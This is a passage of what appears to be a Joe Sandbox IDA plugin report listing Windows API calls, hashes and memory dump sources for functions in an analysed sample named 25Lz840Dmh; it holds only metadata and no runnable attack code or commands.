                                                  • Opcode ID: ab3e06a608211e028190ba67a02ca72d28c2b40119fc818d179e231624a54897
                                                  • Instruction ID: 7666a97db3e92cc31212aa1e94c0b03cd44b70e30ac73f83777a0383a2282073
                                                  • Opcode Fuzzy Hash: ab3e06a608211e028190ba67a02ca72d28c2b40119fc818d179e231624a54897
                                                  • Instruction Fuzzy Hash: 9F41AB302002009FDB20EF64CCD5F7DBBA5AF40350F088459F9169B2D2DB70A949DB91
                                                  APIs
                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00C53033
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: IconLoad
                                                  • String ID: blank$info$question$stop$warning
                                                  • API String ID: 2457776203-404129466
                                                  • Opcode ID: de9885c969bdbda29f41c4176d5acbe38a87ace881423bf4d9571b0a8c2f2c10
                                                  • Instruction ID: 3221fd5425b9c4a92119b8cfbf8d6203dcc565b44a47b672960535fe97ec4da1
                                                  • Opcode Fuzzy Hash: de9885c969bdbda29f41c4176d5acbe38a87ace881423bf4d9571b0a8c2f2c10
                                                  • Instruction Fuzzy Hash: 50118E397483C67FE7158A54DC82DAB779C9F163A2B10002AFD10561C2DB715FC825A8
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C54312
                                                  • LoadStringW.USER32(00000000), ref: 00C54319
                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C5432F
                                                  • LoadStringW.USER32(00000000), ref: 00C54336
                                                  • _wprintf.LIBCMT ref: 00C5435C
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C5437A
                                                  Strings
                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00C54357
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                  • API String ID: 3648134473-3128320259
                                                  • Opcode ID: e1308c9ed746c736ca4944b39c64e86a617d1b17ea5074c0cefd3d3ce9bc0b84
                                                  • Instruction ID: 28b61feb67e07e4551c8036786670d99f5e501cc8026f87077f32e9f1cde473a
                                                  • Opcode Fuzzy Hash: e1308c9ed746c736ca4944b39c64e86a617d1b17ea5074c0cefd3d3ce9bc0b84
                                                  • Instruction Fuzzy Hash: 79014FF6900208BFE75197A0DD89FEA776CEB08701F4005B9BB49E2061EA749EC64B74
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00C7D47C
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00C7D49C
                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C7D6D7
                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C7D6F5
                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C7D716
                                                  • ShowWindow.USER32(00000003,00000000), ref: 00C7D735
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C7D75A
                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00C7D77D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                  • String ID:
                                                  • API String ID: 1211466189-0
                                                  • Opcode ID: 901ae930fccd1c8e2e78fa2b5e8d6cb188917ce29801c6c6afda4fe95ca41c8f
                                                  • Instruction ID: e2e29aa5c7f7f0362a8caedffd406278e565aec25597f943ebcd82ed31944545
                                                  • Opcode Fuzzy Hash: 901ae930fccd1c8e2e78fa2b5e8d6cb188917ce29801c6c6afda4fe95ca41c8f
                                                  • Instruction Fuzzy Hash: 02B18A75600219ABDF18CF69C9C5BAD7BB1BF04701F08C169FC5E9B299D734AA90CB60
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C2C1C7,00000004,00000000,00000000,00000000), ref: 00BF2ACF
                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C2C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00BF2B17
                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C2C1C7,00000004,00000000,00000000,00000000), ref: 00C2C21A
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C2C1C7,00000004,00000000,00000000,00000000), ref: 00C2C286
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: a6ff9708ceb4cb2917b8223c6255fcbd4d87db9781571f553d36b08fdc1cf3a1
                                                  • Instruction ID: 5a323ef3cb975566981aaaf98d4f0b18b439abc773ebe5bc99d35caa533f1bad
                                                  • Opcode Fuzzy Hash: a6ff9708ceb4cb2917b8223c6255fcbd4d87db9781571f553d36b08fdc1cf3a1
                                                  • Instruction Fuzzy Hash: 0C411A30608E88DAC7398B39DCDCB7F7BD2EB85310F14889DE25787961CA75988AD711
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C570DD
                                                    • Part of subcall function 00C10DB6: std::exception::exception.LIBCMT ref: 00C10DEC
                                                    • Part of subcall function 00C10DB6: __CxxThrowException@8.LIBCMT ref: 00C10E01
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C57114
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00C57130
                                                  • _memmove.LIBCMT ref: 00C5717E
                                                  • _memmove.LIBCMT ref: 00C5719B
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00C571AA
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C571BF
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C571DE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 256516436-0
                                                  • Opcode ID: 93d2eae1861c1a174207586fc62317df967d3df81c3a822905bd5405563e047f
                                                  • Instruction ID: ea45747f4eacc5f6fea73c8e03027638bad74e022e5b84741798aa9fea7dbe5f
                                                  • Opcode Fuzzy Hash: 93d2eae1861c1a174207586fc62317df967d3df81c3a822905bd5405563e047f
                                                  • Instruction Fuzzy Hash: 3A319235900205EBCF00DFA5DC85AAF7778EF45310F2441A9FD089B246DB709E95DB60
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00C761EB
                                                  • GetDC.USER32(00000000), ref: 00C761F3
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C761FE
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00C7620A
                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C76246
                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C76257
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C7902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00C76291
                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C762B1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                  • String ID:
                                                  • API String ID: 3864802216-0
                                                  • Opcode ID: cb0570e6b0b3d11cb4f0f83fc030dd4f31ccdc2d6fd72557792cb7ea8f82c597
                                                  • Instruction ID: 33e31df23076cc5787eef999479e6fb83f5754815d12c9660c6dc5db820c8882
                                                  • Opcode Fuzzy Hash: cb0570e6b0b3d11cb4f0f83fc030dd4f31ccdc2d6fd72557792cb7ea8f82c597
                                                  • Instruction Fuzzy Hash: E5316D72101614BFEB118F54CC8AFEA3BA9EF49765F044065FE0C9A292D6759C82CB60
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 7e5bc72ea2c1611f5c093a9473427cd76f270960a334d678ca3a8c47c83f5ef2
                                                  • Instruction ID: 4891573043a88de74e865c9c40aa3d82810ef2daeb009fbdbbd1749e2ef7b2c5
                                                  • Opcode Fuzzy Hash: 7e5bc72ea2c1611f5c093a9473427cd76f270960a334d678ca3a8c47c83f5ef2
                                                  • Instruction Fuzzy Hash: D421C0716012067BE60476229DC2FFB775DFE1178CF084029FE0596647EB68DF21E2A5
                                                  APIs
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                    • Part of subcall function 00C0FC86: _wcscpy.LIBCMT ref: 00C0FCA9
                                                  • _wcstok.LIBCMT ref: 00C5EC94
                                                  • _wcscpy.LIBCMT ref: 00C5ED23
                                                  • _memset.LIBCMT ref: 00C5ED56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                  • String ID: X
                                                  • API String ID: 774024439-3081909835
                                                  • Opcode ID: ff94cb7f557be55b838289519a15b43c714e182c3eee52c2df8c75dca1180875
                                                  • Instruction ID: bdaf7345e878e2ad60b22487cbb4ca6979b94e45c8b4494b277bb8e72d3c0a7a
                                                  • Opcode Fuzzy Hash: ff94cb7f557be55b838289519a15b43c714e182c3eee52c2df8c75dca1180875
                                                  • Instruction Fuzzy Hash: E5C191755083049FC728EF64C885E6AB7E0FF85310F00496DF9999B2A2DB70ED89CB46
                                                  APIs
                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C66C00
                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C66C21
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C66C34
                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 00C66CEA
                                                  • inet_ntoa.WSOCK32(?), ref: 00C66CA7
                                                    • Part of subcall function 00C4A7E9: _strlen.LIBCMT ref: 00C4A7F3
                                                    • Part of subcall function 00C4A7E9: _memmove.LIBCMT ref: 00C4A815
                                                  • _strlen.LIBCMT ref: 00C66D44
                                                  • _memmove.LIBCMT ref: 00C66DAD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                  • String ID:
                                                  • API String ID: 3619996494-0
                                                  • Opcode ID: 5f4c656ecb9b071e7bcb8da9019de669d29775f30c22b03784bc385560d3721d
                                                  • Instruction ID: d7fd951c495d34465f478106b83e56aeaaad11f0f1b8fed7ca04bb5ac66e30a2
                                                  • Opcode Fuzzy Hash: 5f4c656ecb9b071e7bcb8da9019de669d29775f30c22b03784bc385560d3721d
                                                  • Instruction Fuzzy Hash: A981B171204204ABC720EF24CCC6F7AB7E8AF84714F144A6CF6559B2D2DA70ED45CB92
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b0164e5257cc9b74b22d96abb15d880a70c00d3a8c137b7c81947c1c6ba49d1
                                                  • Instruction ID: e05897d2ebda8fdc0fd1162890bcac55b4a6cd69e45d1875cd78039a3eab2b30
                                                  • Opcode Fuzzy Hash: 3b0164e5257cc9b74b22d96abb15d880a70c00d3a8c137b7c81947c1c6ba49d1
                                                  • Instruction Fuzzy Hash: 71717E70900109EFDB04CF99CC85ABEBBB9FF85310F148999FA15AB251C730AA55CFA4
                                                  APIs
                                                  • IsWindow.USER32(015652E0), ref: 00C7B3EB
                                                  • IsWindowEnabled.USER32(015652E0), ref: 00C7B3F7
                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C7B4DB
                                                  • SendMessageW.USER32(015652E0,000000B0,?,?), ref: 00C7B512
                                                  • IsDlgButtonChecked.USER32(?,?), ref: 00C7B54F
                                                  • GetWindowLongW.USER32(015652E0,000000EC), ref: 00C7B571
                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C7B589
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                  • String ID:
                                                  • API String ID: 4072528602-0
                                                  • Opcode ID: 262d7876e40db76a9f0b2663a73b8747456af78dc294421a5e51de4c3f169671
                                                  • Instruction ID: 7d333a61654c7b70cfeb9c332d7abfaa8fe6cc92c388477131041cbbc1e7fbfe
                                                  • Opcode Fuzzy Hash: 262d7876e40db76a9f0b2663a73b8747456af78dc294421a5e51de4c3f169671
                                                  • Instruction Fuzzy Hash: B5718034604604EFDB219F65C8D4FBA7BB9FF09300F148159F969972A2CB31AE81DB50
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C6F448
                                                  • _memset.LIBCMT ref: 00C6F511
                                                  • ShellExecuteExW.SHELL32(?), ref: 00C6F556
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                    • Part of subcall function 00C0FC86: _wcscpy.LIBCMT ref: 00C0FCA9
                                                  • GetProcessId.KERNEL32(00000000), ref: 00C6F5CD
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C6F5FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                  • String ID: @
                                                  • API String ID: 3522835683-2766056989
                                                  • Opcode ID: dce0b6d5582d557ecab485148f8f23f0009cf88b1105d7dcf37421db04cb70e1
                                                  • Instruction ID: 4096135ac33a66a234c49d3142b0bd4029201e78eb868e306d695fe35a60547e
                                                  • Opcode Fuzzy Hash: dce0b6d5582d557ecab485148f8f23f0009cf88b1105d7dcf37421db04cb70e1
                                                  • Instruction Fuzzy Hash: F461BF75A006199FCB14DF64D481AAEBBF5FF49350F1480ADE85AAB351CB30AE46CF90
                                                  APIs
                                                  • GetParent.USER32(?), ref: 00C50F8C
                                                  • GetKeyboardState.USER32(?), ref: 00C50FA1
                                                  • SetKeyboardState.USER32(?), ref: 00C51002
                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C51030
                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C5104F
                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C51095
                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C510B8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 0ecd46e51f7d3514b3fb3702fbd900128bdc45fa0525bea5c5f8a83301f81281
                                                  • Instruction ID: 4798a869957217cd5bf477811b9fb068c69987e33520bd566e868ce0f0d68621
                                                  • Opcode Fuzzy Hash: 0ecd46e51f7d3514b3fb3702fbd900128bdc45fa0525bea5c5f8a83301f81281
                                                  • Instruction Fuzzy Hash: 085134645047D53DFB3642748C49BBABEA96B06306F0C8589EDE4868C3C2D8DECCD754
                                                  APIs
                                                  • GetParent.USER32(00000000), ref: 00C50DA5
                                                  • GetKeyboardState.USER32(?), ref: 00C50DBA
                                                  • SetKeyboardState.USER32(?), ref: 00C50E1B
                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C50E47
                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C50E64
                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C50EA8
                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C50EC9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 29ed0b6785b16020de0b6a17753ff2f6df531f6a2f4887ac07af6bc3ca7703c8
                                                  • Instruction ID: 91023e990ac8bf1ffe71d697ac63ba234e8a607170fef0db8edb85a21c252185
                                                  • Opcode Fuzzy Hash: 29ed0b6785b16020de0b6a17753ff2f6df531f6a2f4887ac07af6bc3ca7703c8
                                                  • Instruction Fuzzy Hash: 2B51F6A45046D57DFB3243648C46B7A7FA96B06301F28498DE9E4C64C2C3D5ADCCE758
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _wcsncpy$LocalTime
                                                  • String ID:
                                                  • API String ID: 2945705084-0
                                                  • Opcode ID: 7581a56bc054100443c9dae325a1cc1986050e9f185e1ed5de0a5bef76bc6cef
                                                  • Instruction ID: b6b88771e12fad9f9c5244b210dace7253d286e6fd829978b9743c02602bff9b
                                                  • Opcode Fuzzy Hash: 7581a56bc054100443c9dae325a1cc1986050e9f185e1ed5de0a5bef76bc6cef
                                                  • Instruction Fuzzy Hash: E741C779C2061476CB11EBB58C469CFB3B89F05310F504456F919E3221EB34A3D5E7AA
                                                  APIs
                                                    • Part of subcall function 00C5466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C53697,?), ref: 00C5468B
                                                    • Part of subcall function 00C5466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C53697,?), ref: 00C546A4
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00C536B7
                                                  • _wcscmp.LIBCMT ref: 00C536D3
                                                  • MoveFileW.KERNEL32(?,?), ref: 00C536EB
                                                  • _wcscat.LIBCMT ref: 00C53733
                                                  • SHFileOperationW.SHELL32(?), ref: 00C5379F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
